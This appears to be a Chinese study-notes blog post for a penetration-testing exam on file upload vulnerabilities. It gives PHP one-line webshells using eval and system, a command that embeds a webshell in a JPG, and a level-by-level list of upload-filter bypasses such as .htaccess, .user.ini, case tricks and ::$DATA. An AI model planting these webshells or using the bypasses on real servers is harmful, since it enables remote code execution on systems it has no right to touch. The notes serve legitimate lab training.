【PTE-day06 文件上传】

1、知识

X-Forwarded-For:表示HTTP请求端的真实IP

文件上传漏洞(头像更改、发邮件、上传资料等)

1、利用文件上传功能上传恶意文件:一句话木马文件、反弹shell的exe

2、上传文件的路径可访问

3、上传文件所在的路径具备可执行权限

复制代码
一句话木马
传参方式:POST GET REQUEST
<?php @eval($_POST['c']);?>
@:防报错
eval() :代码执行函数

<?php @system($_POST['c']);?>

#将木马写到图片中
copy a.jpg/b+muma.php/a muma.jpg

2、文件上传

(1)靶场

复制代码
http://116.205.189.153:9003/Pass-01/index.php

💷第一关前端过滤

禁用js

修改后缀

💸第二关文件类型过滤

黑名单过滤

💳第三关畸形后缀名--php php3 php4 php5 phtml

🧾第四关.htaccess

💹第五关.user.ini

auto_prepend_file=muma.jpg

auto_append_file=muma.jpg

readme.php

💶第六关大小写绕过

windows特性绕过--目标服务器为Windows服务器

💵第七关后缀加空格 '.php '-->.php

💴第八关后缀加. .php. -->.php

🪙第九关后缀加::$DATA

💰第十关后缀加. .

📆第十一关双写绕过

相关推荐
treesforest15 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
上海云盾第一敬业销售15 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手15 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub15 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61115 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux15 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
持敬chijing15 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵15 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全
Chengbei1115 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
AI784016 天前
安全左移:网络安全从“亡羊补牢”走向“未雨绸缪”
网络·安全·web安全